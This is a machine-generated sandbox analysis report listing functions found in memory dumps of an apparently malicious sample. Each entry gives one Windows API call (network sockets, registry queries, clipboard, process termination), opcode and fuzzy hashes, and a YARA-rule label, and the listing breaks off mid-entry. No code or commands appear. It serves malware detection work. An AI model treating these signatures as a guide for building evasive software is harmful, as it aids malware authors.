Function 06092DD2, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092E4D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 6eee5cc929a8ee52099a64d05086544b018b5968de57f7f2f2513f409b9fa57b
Instruction ID: b335aa882de9fc10c7f734c79821d10a9fd457eb5e1492aadc450e0e7142d965
Opcode Fuzzy Hash: 6eee5cc929a8ee52099a64d05086544b018b5968de57f7f2f2513f409b9fa57b
Instruction Fuzzy Hash: 96219F71500604AFEB61CF66DC84FA6FBE9EF08710F04846AED498B651E330E544DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 060910BA, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06091139

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c2f8115774cef66672c398e6a6c0b43434e8c3a53ad5a3064ed9bda0647f0891
Instruction ID: dae9349e6a4c1fe63f7c433c7903b2832d5a4c2c8c1b10920c1f8f622d7f0815
Opcode Fuzzy Hash: c2f8115774cef66672c398e6a6c0b43434e8c3a53ad5a3064ed9bda0647f0891
Instruction Fuzzy Hash: CA216F72509380AFDB228F65DC45F97FFF8EF4A710F0884AAE9459B152C275A408CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BAA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BAA8C

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 559748b6f27a728573d897e9d87147c00b21288402a362d614de17fa39824a0e
Instruction ID: f12115466269f2e16cfe91dad204eb33f4ef2eeeb5243cd7cf20a112cec9af87
Opcode Fuzzy Hash: 559748b6f27a728573d897e9d87147c00b21288402a362d614de17fa39824a0e
Instruction Fuzzy Hash: CD216D71600604AFEB21CE5ADD84FA6BBECEF08710F08846AED458B251D760E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0609184E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060918C0

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 33183b6195c561b5f67db27e45fac1e9b3b85ffdb383fe193139877087e57612
Instruction ID: c12ea0937cc8948b7cb1333e0282be91b13390c0bd2ac8e7f48fbb8c1cd296a1
Opcode Fuzzy Hash: 33183b6195c561b5f67db27e45fac1e9b3b85ffdb383fe193139877087e57612
Instruction Fuzzy Hash: 23216D76A40200AFEB60CF55DC44BA7BBE8EF08710F0484AAED459B251D674E544DA71

Uniqueness

Uniqueness Score: -1.00%

Function 0609305A, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 060930DE

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: cfd5aa9a3437b30db677ea4efe212244d1d0388f1573628c28ab47ede5f19490
Instruction ID: 0aeedbc44b176bd051be63db6d7b9bbfe1eee27bb8334458086c8dcfceca9850
Opcode Fuzzy Hash: cfd5aa9a3437b30db677ea4efe212244d1d0388f1573628c28ab47ede5f19490
Instruction Fuzzy Hash: F2218E754093809FDB228F61DC85A92BFF4EF06210F0984DEE9858B563D275A808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 016BAFD4, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,10C26EF0,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 016BB040

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 193b07bd177e55ee460b9bb7949f491a78ddec90db32fd002eff344966e19f1a
Instruction ID: f8bb9a72a2fce52173607ca5ca6604705a9c85667aebe5bd1091d51c4b94124f
Opcode Fuzzy Hash: 193b07bd177e55ee460b9bb7949f491a78ddec90db32fd002eff344966e19f1a
Instruction Fuzzy Hash: FA21A1725093C05FDB038B25DC94692BFA4AF07224F0980EAEC858F663D265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 06091E2F, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 06091EAC

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 2dc76f94912fa1f836ad6508d9f8903e78d74d6df97ffcbd9fee572c0695bff6
Instruction ID: fe29809fde154d73f27c3e0094df5b38ad87d078b02a9f7ec83024262022a409
Opcode Fuzzy Hash: 2dc76f94912fa1f836ad6508d9f8903e78d74d6df97ffcbd9fee572c0695bff6
Instruction Fuzzy Hash: 9E21AF365093C09FDB128F61DC44A92BFB4EF07320F0D85DAE9848F563C235A419CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06092322, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 0609238D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 19e55e1a7cf982590a6e8b9617b71043dc1bac67d4d68074c25f4c79a3feabf6
Instruction ID: afba29ea5603b1a033da73578d51906076476ef1d08b8b7ffdc31a8fdbfbb972
Opcode Fuzzy Hash: 19e55e1a7cf982590a6e8b9617b71043dc1bac67d4d68074c25f4c79a3feabf6
Instruction Fuzzy Hash: C321AE71500244AFEB21DF29DC45B6AFFE8EF04320F18C46AED848B241D375A544CA71

Uniqueness

Uniqueness Score: -1.00%

Function 06091B67, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06091BE8

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: ad6f3d7986383435c33f90d607338be534d13c4423af133a4d84f219b56685ed
Instruction ID: a3efcca27dfeb6a1891429e67d9c51371279ad0bdb060e42e2db42872638d1be
Opcode Fuzzy Hash: ad6f3d7986383435c33f90d607338be534d13c4423af133a4d84f219b56685ed
Instruction Fuzzy Hash: 5B21A2715483846FEB128B15DC44FA6FFA8EF46320F0884EAED849B153C265A549CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BAAFB, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 016BAB7E

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: f3ea1cacd4d18eee1eafc9c1eb22a8943b2afafb32e4449e696eeaf946a669e6
Instruction ID: ac19aec193f7db8c955fa5d7dbff3e9627c3f7ca92a45fdead61a37fd805c3ce
Opcode Fuzzy Hash: f3ea1cacd4d18eee1eafc9c1eb22a8943b2afafb32e4449e696eeaf946a669e6
Instruction Fuzzy Hash: A421D3715053806FD312CB2ADC41F72BFB8EF86720F19819AEC848B652D220F915CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 016BB73E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB7A2

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 13ed477dacf80e87e327c70719aa089113b1c72e34399da7c3a2f6ad7d692d63
Instruction ID: 828e727c55a055a4bb31a979ec0c60ce0f8160ab1c60c9ab0a069305bf4e0631
Opcode Fuzzy Hash: 13ed477dacf80e87e327c70719aa089113b1c72e34399da7c3a2f6ad7d692d63
Instruction Fuzzy Hash: 3D119A71500200AFEB208B2ADC85FAABBA8EF04320F08846AED49CB241D664A4488B71

Uniqueness

Uniqueness Score: -1.00%

Function 06092422, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06092496

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: f880762468ada7c09a15abd5c995f235100f9d87bc95a4dea92653ebd5e7dfc6
Instruction ID: 21c6e0444c23a0dad76914145c440dfb4baad27430aadbf73c9019de1d6c3073
Opcode Fuzzy Hash: f880762468ada7c09a15abd5c995f235100f9d87bc95a4dea92653ebd5e7dfc6
Instruction Fuzzy Hash: 0021C071500244AFEB21CF29DD44FAAFFE8EF08320F14845EE9858B651D371A548CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 06091D6A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 06091DD6

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 09f0b3d5cc1d9a09330278f71c14f207775b65a71dcaec067860467e5c16c44b
Instruction ID: 32f492e52bd17df596bebabdb64ff443d3faf6a409a5ee88a38ba3a7583b1172
Opcode Fuzzy Hash: 09f0b3d5cc1d9a09330278f71c14f207775b65a71dcaec067860467e5c16c44b
Instruction Fuzzy Hash: 0621F071500240AFEB21CF65EC44BA6FFE9EF08320F1488AEED858B641D371A408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BAC3B, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,10C26EF0,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 016BACA8

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c27213e44336902672b622560f3b08cbea8c4728dec882cf5bc8af82635f6375
Instruction ID: 6669741834396ce9607b1794c6cd19c6952e916e147300ca17d3efa76f105ac9
Opcode Fuzzy Hash: c27213e44336902672b622560f3b08cbea8c4728dec882cf5bc8af82635f6375
Instruction Fuzzy Hash: 0221AFB54093C05FEB138B65DC91792BFB4EF07220F0984EBEC848F653D265A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06092086, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060920F8

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c7cf9544c599b09efc05e2c7577a95966cf6deea903e8e1fec6cb6aab5b6eb9f
Instruction ID: f9e0b355ded3b41c6a56f153f32760e1fa07a59740177efc89cfd682ee87d095
Opcode Fuzzy Hash: c7cf9544c599b09efc05e2c7577a95966cf6deea903e8e1fec6cb6aab5b6eb9f
Instruction Fuzzy Hash: C911E172540300AFEB60CF16DC40FA7FBE8EF08720F04846AE9459B241C360E548CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0609289E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060928FD

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 6e844f33f3a44872fa542db260b760fed640ef1fc4ebec6437347df577c4bb2f
Instruction ID: 1766369fcbeabc4f72a1fdf4c2710cbcbc04ab65f52df28c32e0b8aba071c1ce
Opcode Fuzzy Hash: 6e844f33f3a44872fa542db260b760fed640ef1fc4ebec6437347df577c4bb2f
Instruction Fuzzy Hash: 7D11B272500300AFEB618F5AEC45BAAFBE8EF08720F04846AED45DB251D674A545CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BB656, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB6B2

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 312c85bc2470bb27945afe63f941dc85370b21767fbc256e5690fb82974b070a
Instruction ID: f5e4421fb7486a7b0c6bf19db594faae6de11a19ed6359315fdc43e540d8cfdf
Opcode Fuzzy Hash: 312c85bc2470bb27945afe63f941dc85370b21767fbc256e5690fb82974b070a
Instruction Fuzzy Hash: 1B11C471500240AFEB21CF5AEC85BAAFBE8EF44720F14846AED45DB251D774A844CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092EDA, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092F3E

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 64b516813edb33b06931e5dc91b48043303c51c3680aaffb92da617ee7d4ef83
Instruction ID: 413ee2b9e69319c898fa4cbd80ed87e28e44a368c654c7c2ce4b6a0e888edde3
Opcode Fuzzy Hash: 64b516813edb33b06931e5dc91b48043303c51c3680aaffb92da617ee7d4ef83
Instruction Fuzzy Hash: F611B272440204AFEB21CF5ADC84FABFBECEF48320F04846AED49DB241D674A5458BB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BA836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,10C26EF0,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 016BA8A8

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3101e94c92a2591db098cccae2c6416e20e6f6d767487b17095b476ff710c94d
Instruction ID: b2408d24b1468e4c8afae4e39bd9c81c6369564407fd39a2f0684b9cf22100c1
Opcode Fuzzy Hash: 3101e94c92a2591db098cccae2c6416e20e6f6d767487b17095b476ff710c94d
Instruction Fuzzy Hash: 1C216A7140D3C4AFD7138B259C946A2BFB4DF07620F0984DBDC858F2A3D2695908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 016BB25A, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB2B0

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: b08a201bed9c526c8464d404a9538b8218540342bde650fd21b36c3989cb2c84
Instruction ID: d469b31defab71e8f5980dc22bc6a75ef1bed0733b15d171ae335736fd649e4c
Opcode Fuzzy Hash: b08a201bed9c526c8464d404a9538b8218540342bde650fd21b36c3989cb2c84
Instruction Fuzzy Hash: 7F110671500200AFEB11CF1AEC85BBAFBD8EF09320F14C46AED45DB241D674A444CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BA78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BA7F6

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3e3882ee915796d662fb7ce9bcedd328a2865d619404b96b22331aaa25a53a9c
Instruction ID: 1ef9187b418cee183eca94e6ee7658427569b61d1a8f06d3c0e4df37dd4f4f74
Opcode Fuzzy Hash: 3e3882ee915796d662fb7ce9bcedd328a2865d619404b96b22331aaa25a53a9c
Instruction Fuzzy Hash: AE117F72409380AFDB228F55EC44A62FFB4EF4A210F09849AED858B662D375A419DB61

Uniqueness

Uniqueness Score: -1.00%

Function 016BBAEE, Relevance: 1.6, APIs: 1, Instructions: 60comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 016BBB66

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: d9d8273acb146ade44e6c9bb44de2ff8acaf57c39b59f08c002d4c0f9616483c
Instruction ID: 82e9f86623ee303aa22c0c04fe78ce411f8b1d67fa9b3f03124d534a84d9937e
Opcode Fuzzy Hash: d9d8273acb146ade44e6c9bb44de2ff8acaf57c39b59f08c002d4c0f9616483c
Instruction Fuzzy Hash: 6A11C4715093806FC311CB25DC45F66FFB8EF86620F09819BEC484B692D224B915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 060910DA, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06091139

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d6069d7ccd03c42ddd82063ccbcfa2dcb393c791ab5f2d8874b6361e5208a537
Instruction ID: 2ce024651b14ed29ff37d4a4f336825effed37e98ccf108bdd040213a63c6c84
Opcode Fuzzy Hash: d6069d7ccd03c42ddd82063ccbcfa2dcb393c791ab5f2d8874b6361e5208a537
Instruction Fuzzy Hash: A111C172500200AFEB61CF55EC44FAAFFE8EF49720F0484AAED499B251C374A449CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0609191A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,10C26EF0,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 06091978

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1c9a49207c58cdcbc5c1cba0dfec2f8272feb8d163e7d077517d087a983801a3
Instruction ID: 4f2f3b079707cf64866f41485046868dc8672d3eec5ed7bd76908f7a7628625f
Opcode Fuzzy Hash: 1c9a49207c58cdcbc5c1cba0dfec2f8272feb8d163e7d077517d087a983801a3
Instruction Fuzzy Hash: 701190715493C09FDB128B65EC44792BFE4DF06220F0984EAED858F262C239A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06092CF6, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092D4F

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: b2c24005d9b547fe48c31891f9bbbf29e258df32e44896b8bf8795b72bd77608
Instruction ID: c11aa1eca037f21f830f889c040e7220fb186c69a47e1eb0836e67a66b35042b
Opcode Fuzzy Hash: b2c24005d9b547fe48c31891f9bbbf29e258df32e44896b8bf8795b72bd77608
Instruction Fuzzy Hash: 96110271400300AFEB20CF56EC85BAAFFE8EF48320F08C46AED489B241C274A544CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 060927CE, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092824

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 61c6f6fa188c22f1c255c4792cf4efea69f1515593c874ef0e900a27063f6867
Instruction ID: dba5b81f9744eeeb24c4cdaa5429e669d05f75293506caef82cddc183a56613b
Opcode Fuzzy Hash: 61c6f6fa188c22f1c255c4792cf4efea69f1515593c874ef0e900a27063f6867
Instruction Fuzzy Hash: 8C11E971545200AFEF60CF15EC45BABFFD8DF44720F1484AAED489B241D274A545CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 06092FBE, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 0609301D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: d2d94f75a1d971f216ea76438e636c47b119aa766f25294e2507dc98f1cfd6b5
Instruction ID: 35bb2393044b44f77e0944b93986046f6475bb2b70a460ed94cc8f5969cad27a
Opcode Fuzzy Hash: d2d94f75a1d971f216ea76438e636c47b119aa766f25294e2507dc98f1cfd6b5
Instruction Fuzzy Hash: 22110231400300AFEB208F16EC44FAAFFE8EF48720F04846AEE458B251C275A448CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 060906CE, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 06090737

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8011b2069a51af852357e8de75cd1db49c70eda2c061beff08e4e35cbd077b45
Instruction ID: 65461c3dff15a1c0f4bf39eec6ea571daf2502f908512cac883b87c0a5ba7af9
Opcode Fuzzy Hash: 8011b2069a51af852357e8de75cd1db49c70eda2c061beff08e4e35cbd077b45
Instruction Fuzzy Hash: 7211E571940700AFFB20DB15ED81BA6FF98DF04720F14845EED455A281D2B5A544CEB6

Uniqueness

Uniqueness Score: -1.00%

Function 016BA078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 016BA0D5

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 27c9ae9c7e46e29d117a5a4ada3f55f80bde0ab909203161d593f094ce2374a8
Instruction ID: b27a544dfe74aa515740ca792f7040bc03d89417ad199593015199724c71a0dd
Opcode Fuzzy Hash: 27c9ae9c7e46e29d117a5a4ada3f55f80bde0ab909203161d593f094ce2374a8
Instruction Fuzzy Hash: EB118F75409380AFDB22CF55DC84B52FFB4EF45224F0884AAED848B652C275A458CB62

Uniqueness

Uniqueness Score: -1.00%

Function 016BAD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 016BAD6A

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a6eec4cc63569421aba140f900e06c4d99139e881d170d8a35f5a16f33bb006d
Instruction ID: 47d35a661d033237afd6a4dbb74e93bc37011570e5e606728542f0d3b4d1be84
Opcode Fuzzy Hash: a6eec4cc63569421aba140f900e06c4d99139e881d170d8a35f5a16f33bb006d
Instruction Fuzzy Hash: CD117C72A002408FEB60CF69EC85796FBA8EB04221F08846ADD49CB742D774E444CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06091B92, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06091BE8

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 13184bba6322823eaa1a21840c9030587f9349548141c3619e040b075418878f
Instruction ID: 4b430a404e6304c6dbbd086f43c7f19699bcb852d986f5903c823c6e96c198b5
Opcode Fuzzy Hash: 13184bba6322823eaa1a21840c9030587f9349548141c3619e040b075418878f
Instruction Fuzzy Hash: 10012671544200AFEB208F16DC80BAAFFE8EF08720F1484AAED449B242D274A445CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 06090F4A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06090F9D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4d5a22762f9bb8bff50ebe9e8fcabbbb4ccc0aee62de30aaeb47ee17f76dc032
Instruction ID: 70f881bcdeefc9239c725c6c0e139752e271e362a1be913bcb2bf3fb4ae6cfcc
Opcode Fuzzy Hash: 4d5a22762f9bb8bff50ebe9e8fcabbbb4ccc0aee62de30aaeb47ee17f76dc032
Instruction Fuzzy Hash: 5F012631540300AFEB20CB16DC81BAAFFDCDF04720F04C06AED499B641C274A5448AB5

Uniqueness

Uniqueness Score: -1.00%

Function 060912F4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,10C26EF0,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 06091348

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1bb432084615c17ec1f36786f6a2d50acb369cc167ef103fb5b3b9947e37e34d
Instruction ID: d43e217a0d965686af3688f6c4db2a237242ca0b8b9e9f851af4d1ba79352558
Opcode Fuzzy Hash: 1bb432084615c17ec1f36786f6a2d50acb369cc167ef103fb5b3b9947e37e34d
Instruction Fuzzy Hash: FA11A1755093C09FDB128B25DC94B56FFB4DF06220F08C0EBED858B6A2D275A948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 06093092, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 060930DE

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: de95e0c38add49ab64f04d4dc443a37bedaa9bb4ad12b9cc91604e36c72b20ec
Instruction ID: e11ed077e41f0cc014af75ee6e68f8dbe5be775c467f02972c8459571cc7ce7e
Opcode Fuzzy Hash: de95e0c38add49ab64f04d4dc443a37bedaa9bb4ad12b9cc91604e36c72b20ec
Instruction Fuzzy Hash: 68119A319043009FDB60CF95E845BA6FFE5EF48320F0884AADE858B622D331A408DF72

Uniqueness

Uniqueness Score: -1.00%

Function 016BB366, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 016BB3B6

Memory Dump Source

